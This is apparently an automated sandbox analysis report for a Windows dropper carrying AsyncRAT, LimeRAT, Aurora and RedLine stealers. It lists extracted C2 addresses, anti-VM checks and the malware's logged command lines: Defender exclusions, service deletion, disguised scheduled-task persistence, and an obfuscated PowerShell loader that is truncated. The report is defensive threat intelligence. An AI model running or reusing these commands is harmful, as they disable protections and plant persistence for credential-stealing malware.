asyncrat | d058305ddf083f58cb70b13eb26b49c029b8f2eb329c98c1574b2489f6a44809

Analysis

max time kernel
53s
max time network
112s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
17-01-2023 23:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bef2253333e2663aa740460ede3ee25e.exe
Size

29.0MB
MD5

bef2253333e2663aa740460ede3ee25e
SHA1

774d4ebdb884b4e32ffe7e36fa691aaaf5505f3c
SHA256

d058305ddf083f58cb70b13eb26b49c029b8f2eb329c98c1574b2489f6a44809
SHA512

160cb1e4b383be3f0809bc79a2d12176f146510070b4ca5c23db0344c571115c0fd2146cfdb72ceea92abe840c02070cd8f08581211acb6b0eb39ea92222d6cb
SSDEEP

786432:QuPxiY4bJfwP+v53za5RuHKhPzMYd36qfd3a:DpiTbJYPIlnqBMyBa

Score

10^/10

asyncrat aurora limerat redline @miroskati new evasion infostealer rat spyware stealer upx vmprotect

Malware Config

Extracted

Family

limerat

Attributes

aes_key
123
antivm
true
c2_url
https://pastebin.com/raw/mchxnAbT
delay
80
download_payload
false
install
true
install_name
WindosCert.exe
main_folder
AppData
pin_spread
true
sub_folder
\
usb_spread
true

Extracted

Family

aurora

37.220.87.13:8081

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

NEW

Mutex

ihouhh

Attributes

delay
80
install
true
install_file
UpdateChromeDay.exe
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/mchxnAbT

aes.plain

Extracted

Family

redline

185.215.113.69:15544

62.204.41.141:24758

45.15.157.131:36457

Attributes

auth_value
971353143dce4409844e1f4f0f5f7af8

Extracted

Family

redline

Botnet

@Miroskati

rllalasyeo.xyz:80

Attributes

auth_value
384ebbf9bd4d7e80bf3269909b298f87

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Aurora
Aurora is a crypto wallet stealer written in Golang.
stealer aurora
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

directxc.exe

description	pid	Process	procid_target
PID 2792 created 2340	2792	directxc.exe	55

Async RAT payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral2/files/0x000400000001da4a-156.dat	asyncrat
behavioral2/memory/3544-157-0x0000000000410000-0x0000000000432000-memory.dmp	asyncrat
behavioral2/files/0x000400000001da4a-155.dat	asyncrat

Enumerates VirtualBox registry keys 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

directxw.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse	directxw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService	directxw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo	directxw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	directxw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest	directxw.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

directxw.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	directxw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\FADT\VBOX__	directxw.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\RSDT\VBOX__	directxw.exe

Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

directxw.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions	directxw.exe

Executes dropped EXE 11 IoCs

Processes:

ChromeUpdate.exedirectx.exedirectxc.exedirectxCrack.exedirectxERR.exedirectxMer.exedirectxUp.exedirectxw.exevsdir.exeidman641build6.exeIDM1.tmp

pid	Process
3044	ChromeUpdate.exe
2304	directx.exe
2792	directxc.exe
320	directxCrack.exe
2620	directxERR.exe
3544	directxMer.exe
3996	directxUp.exe
1380	directxw.exe
3364	vsdir.exe
3980	idman641build6.exe
3812	IDM1.tmp

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x00040000000162ab-138.dat	upx
behavioral2/files/0x00040000000162ab-137.dat	upx
behavioral2/memory/3044-154-0x0000000000980000-0x0000000000D04000-memory.dmp	upx
behavioral2/memory/3044-220-0x0000000000980000-0x0000000000D04000-memory.dmp	upx

VMProtect packed file 7 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/4188-132-0x0000000000400000-0x0000000003D1A000-memory.dmp	vmprotect
behavioral2/memory/4188-133-0x0000000000400000-0x0000000003D1A000-memory.dmp	vmprotect
behavioral2/files/0x000200000001e573-163.dat	vmprotect
behavioral2/files/0x000200000001e573-162.dat	vmprotect
behavioral2/memory/4188-184-0x0000000000400000-0x0000000003D1A000-memory.dmp	vmprotect
behavioral2/memory/1380-207-0x0000000000400000-0x000000000132A000-memory.dmp	vmprotect
behavioral2/memory/1380-238-0x0000000000400000-0x000000000132A000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bef2253333e2663aa740460ede3ee25e.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	bef2253333e2663aa740460ede3ee25e.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

bef2253333e2663aa740460ede3ee25e.exe

pid	Process
4188	bef2253333e2663aa740460ede3ee25e.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

directx.exedirectxERR.exevsdir.exedirectxUp.exe

description	pid	Process	procid_target
PID 2304 set thread context of 1884	2304	directx.exe	98
PID 2620 set thread context of 1824	2620	directxERR.exe	102
PID 3364 set thread context of 672	3364	vsdir.exe	103
PID 3996 set thread context of 2392	3996	directxUp.exe	104

Launches sc.exe 5 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid	Process
1628	sc.exe
1328	sc.exe
4544	sc.exe
2328	sc.exe
1304	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 4 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	Process	procid_target
2464	2304	WerFault.exe	87
1256	2620	WerFault.exe	91
4788	3364	WerFault.exe	97
4952	3996	WerFault.exe	94

Suspicious behavior: EnumeratesProcesses 17 IoCs

Processes:

bef2253333e2663aa740460ede3ee25e.exepowershell.exedirectxw.exevbc.exedirectxc.exepowershell.exe

pid	Process
4188	bef2253333e2663aa740460ede3ee25e.exe
4188	bef2253333e2663aa740460ede3ee25e.exe
3192	powershell.exe
1380	directxw.exe
1380	directxw.exe
1380	directxw.exe
1380	directxw.exe
3192	powershell.exe
3192	powershell.exe
1380	directxw.exe
1380	directxw.exe
672	vbc.exe
2792	directxc.exe
2792	directxc.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exevbc.exepowershell.exe

description	pid	Process
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	672	vbc.exe
Token: SeDebugPrivilege	4688	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

bef2253333e2663aa740460ede3ee25e.exedirectx.exeidman641build6.exedirectxERR.exevsdir.exedirectxUp.exedirectxw.execmd.exe

description	pid	Process	procid_target
PID 4188 wrote to memory of 3192	4188	bef2253333e2663aa740460ede3ee25e.exe	84
PID 4188 wrote to memory of 3192	4188	bef2253333e2663aa740460ede3ee25e.exe	84
PID 4188 wrote to memory of 3192	4188	bef2253333e2663aa740460ede3ee25e.exe	84
PID 4188 wrote to memory of 3044	4188	bef2253333e2663aa740460ede3ee25e.exe	86
PID 4188 wrote to memory of 3044	4188	bef2253333e2663aa740460ede3ee25e.exe	86
PID 4188 wrote to memory of 2304	4188	bef2253333e2663aa740460ede3ee25e.exe	87
PID 4188 wrote to memory of 2304	4188	bef2253333e2663aa740460ede3ee25e.exe	87
PID 4188 wrote to memory of 2304	4188	bef2253333e2663aa740460ede3ee25e.exe	87
PID 4188 wrote to memory of 2792	4188	bef2253333e2663aa740460ede3ee25e.exe	89
PID 4188 wrote to memory of 2792	4188	bef2253333e2663aa740460ede3ee25e.exe	89
PID 4188 wrote to memory of 320	4188	bef2253333e2663aa740460ede3ee25e.exe	90
PID 4188 wrote to memory of 320	4188	bef2253333e2663aa740460ede3ee25e.exe	90
PID 4188 wrote to memory of 320	4188	bef2253333e2663aa740460ede3ee25e.exe	90
PID 4188 wrote to memory of 2620	4188	bef2253333e2663aa740460ede3ee25e.exe	91
PID 4188 wrote to memory of 2620	4188	bef2253333e2663aa740460ede3ee25e.exe	91
PID 4188 wrote to memory of 2620	4188	bef2253333e2663aa740460ede3ee25e.exe	91
PID 4188 wrote to memory of 3544	4188	bef2253333e2663aa740460ede3ee25e.exe	92
PID 4188 wrote to memory of 3544	4188	bef2253333e2663aa740460ede3ee25e.exe	92
PID 4188 wrote to memory of 3544	4188	bef2253333e2663aa740460ede3ee25e.exe	92
PID 4188 wrote to memory of 3996	4188	bef2253333e2663aa740460ede3ee25e.exe	94
PID 4188 wrote to memory of 3996	4188	bef2253333e2663aa740460ede3ee25e.exe	94
PID 4188 wrote to memory of 3996	4188	bef2253333e2663aa740460ede3ee25e.exe	94
PID 4188 wrote to memory of 1380	4188	bef2253333e2663aa740460ede3ee25e.exe	96
PID 4188 wrote to memory of 1380	4188	bef2253333e2663aa740460ede3ee25e.exe	96
PID 4188 wrote to memory of 1380	4188	bef2253333e2663aa740460ede3ee25e.exe	96
PID 4188 wrote to memory of 3364	4188	bef2253333e2663aa740460ede3ee25e.exe	97
PID 4188 wrote to memory of 3364	4188	bef2253333e2663aa740460ede3ee25e.exe	97
PID 4188 wrote to memory of 3364	4188	bef2253333e2663aa740460ede3ee25e.exe	97
PID 2304 wrote to memory of 1884	2304	directx.exe	98
PID 2304 wrote to memory of 1884	2304	directx.exe	98
PID 2304 wrote to memory of 1884	2304	directx.exe	98
PID 4188 wrote to memory of 3980	4188	bef2253333e2663aa740460ede3ee25e.exe	100
PID 4188 wrote to memory of 3980	4188	bef2253333e2663aa740460ede3ee25e.exe	100
PID 4188 wrote to memory of 3980	4188	bef2253333e2663aa740460ede3ee25e.exe	100
PID 2304 wrote to memory of 1884	2304	directx.exe	98
PID 2304 wrote to memory of 1884	2304	directx.exe	98
PID 3980 wrote to memory of 3812	3980	idman641build6.exe	101
PID 3980 wrote to memory of 3812	3980	idman641build6.exe	101
PID 3980 wrote to memory of 3812	3980	idman641build6.exe	101
PID 2620 wrote to memory of 1824	2620	directxERR.exe	102
PID 2620 wrote to memory of 1824	2620	directxERR.exe	102
PID 2620 wrote to memory of 1824	2620	directxERR.exe	102
PID 2620 wrote to memory of 1824	2620	directxERR.exe	102
PID 3364 wrote to memory of 672	3364	vsdir.exe	103
PID 3364 wrote to memory of 672	3364	vsdir.exe	103
PID 3364 wrote to memory of 672	3364	vsdir.exe	103
PID 3996 wrote to memory of 2392	3996	directxUp.exe	104
PID 3996 wrote to memory of 2392	3996	directxUp.exe	104
PID 3996 wrote to memory of 2392	3996	directxUp.exe	104
PID 3364 wrote to memory of 672	3364	vsdir.exe	103
PID 2620 wrote to memory of 1824	2620	directxERR.exe	102
PID 3996 wrote to memory of 2392	3996	directxUp.exe	104
PID 3364 wrote to memory of 672	3364	vsdir.exe	103
PID 3996 wrote to memory of 2392	3996	directxUp.exe	104
PID 1380 wrote to memory of 2124	1380	directxw.exe	114
PID 1380 wrote to memory of 2124	1380	directxw.exe	114
PID 1380 wrote to memory of 2124	1380	directxw.exe	114
PID 2124 wrote to memory of 620	2124	cmd.exe	150
PID 2124 wrote to memory of 620	2124	cmd.exe	150
PID 2124 wrote to memory of 620	2124	cmd.exe	150

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:2340
- C:\Users\Admin\AppData\Local\Temp\bef2253333e2663aa740460ede3ee25e.exe
  "C:\Users\Admin\AppData\Local\Temp\bef2253333e2663aa740460ede3ee25e.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4188
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHoAagBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAcgBkACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAeAB2ACMAPgA="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3192
- - C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe
    "C:\Users\Admin\AppData\Local\Temp\ChromeUpdate.exe"
    3⤵
    - Executes dropped EXE
    PID:3044
  - - C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      4⤵
      PID:1536
  - - C:\Windows\system32\cmd.exe
      cmd /C "wmic path win32_VideoController get name"
      4⤵
      PID:4052
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        
        PID:4440
  - - C:\Windows\system32\cmd.exe
      cmd /C "wmic cpu get name"
      4⤵
      PID:1748
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get name
        5⤵
        
        PID:2276
- - C:\Users\Admin\AppData\Local\Temp\directx.exe
    "C:\Users\Admin\AppData\Local\Temp\directx.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:1884
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 152
      4⤵
      Program crash
      PID:2464
- - C:\Users\Admin\AppData\Local\Temp\directxc.exe
    "C:\Users\Admin\AppData\Local\Temp\directxc.exe"
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2792
- - C:\Users\Admin\AppData\Local\Temp\directxCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\directxCrack.exe"
    3⤵
    - Executes dropped EXE
    PID:320
- - C:\Users\Admin\AppData\Local\Temp\directxERR.exe
    "C:\Users\Admin\AppData\Local\Temp\directxERR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:1824
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 468
      4⤵
      Program crash
      PID:1256
- - C:\Users\Admin\AppData\Local\Temp\directxMer.exe
    "C:\Users\Admin\AppData\Local\Temp\directxMer.exe"
    3⤵
    - Executes dropped EXE
    PID:3544
- - C:\Users\Admin\AppData\Local\Temp\directxUp.exe
    "C:\Users\Admin\AppData\Local\Temp\directxUp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3996
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:2392
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 140
      4⤵
      Program crash
      PID:4952
- - C:\Users\Admin\AppData\Local\Temp\directxw.exe
    "C:\Users\Admin\AppData\Local\Temp\directxw.exe"
    3⤵
    - Enumerates VirtualBox registry keys
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Looks for VirtualBox Guest Additions in registry
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1380
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c mode con cols=70 lines=20
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2124
    - - C:\Windows\SysWOW64\mode.com
        
        mode con cols=70 lines=20
        5⤵
        
        PID:620
- - C:\Users\Admin\AppData\Local\Temp\vsdir.exe
    "C:\Users\Admin\AppData\Local\Temp\vsdir.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3364
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:672
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3364 -s 256
      4⤵
      Program crash
      PID:4788
- - C:\Users\Admin\AppData\Local\Temp\idman641build6.exe
    "C:\Users\Admin\AppData\Local\Temp\idman641build6.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3980
  - - C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
      "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
      4⤵
      Executes dropped EXE
      PID:3812
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4688
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:1848
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1628
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:1328
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4544
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2328
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:1304
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:868
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:4496
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:4784
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:1668
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:3932
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:3852
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:4840
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:4980
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4892
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#rnspek#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
  2⤵
  PID:3868
- C:\Windows\System32\dialer.exe
  C:\Windows\System32\dialer.exe
  2⤵
  PID:1512
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#egwjvgqbr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
  2⤵
  PID:4952
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
    3⤵
    PID:3648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2620 -ip 2620
1⤵
PID:2328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2304 -ip 2304
1⤵
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3364 -ip 3364
1⤵
PID:3100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3996 -ip 3996
1⤵
PID:3584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:SgAJVybEygZF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$KeIXHdrJKiIbxC,[Parameter(Position=1)][Type]$kQzjBUkdDF)$pMvqPlJwFew=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+[Char](108)+'e'+'c'+'t'+[Char](101)+'d'+'D'+''+[Char](101)+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+[Char](101)+'m'+[Char](111)+'r'+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'',$False).DefineType('M'+[Char](121)+''+'D'+''+'e'+'leg'+[Char](97)+'t'+[Char](101)+''+'T'+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+'Pu'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+'l'+'e'+''+[Char](100)+''+','+'A'+'n'+''+[Char](115)+'i'+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$pMvqPlJwFew.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+'ec'+'i'+'al'+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'de'+[Char](66)+'y'+[Char](83)+'i'+[Char](103)+','+[Char](80)+''+'u'+''+'b'+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$KeIXHdrJKiIbxC).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+[Char](100)+'');$pMvqPlJwFew.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+'o'+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+'l'+[Char](105)+'c'+','+''+'H'+''+'i'+'d'+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+''+','+''+'V'+'ir'+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+'',$kQzjBUkdDF,$KeIXHdrJKiIbxC).SetImplementationFlags('R'+'u'+''+'n'+''+'t'+''+[Char](105)+'me,'+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');Write-Output $pMvqPlJwFew.CreateType();}$zJeRUwVTCRKEU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+'t'+''+'e'+''+'m'+''+'.'+'dll')}).GetType(''+'M'+'i'+[Char](99)+''+[Char](114)+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+'i'+''+[Char](110)+''+'3'+'2'+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](122)+''+[Char](74)+''+'e'+'R'+'U'+''+[Char](119)+''+[Char](86)+''+[Char](84)+''+[Char](67)+''+[Char](82)+''+[Char](75)+''+[Char](69)+''+[Char](85)+'');$RzHnkOitruGaAG=$zJeRUwVTCRKEU.GetMethod(''+'R'+''+'z'+''+[Char](72)+''+'n'+''+[Char](107)+''+'O'+'i'+[Char](116)+''+'r'+''+'u'+''+[Char](71)+''+[Char](97)+'A'+[Char](71)+'',[Reflection.BindingFlags]''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+'c,'+[Char](83)+''+'t'+''+[Char](97)+''+'t'+'i'+'c'+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HIFwGfiHjfdQgJOmUAR=SgAJVybEygZF @([String])([IntPtr]);$shFOAMSQXeypbiOoZRcfYT=SgAJVybEygZF 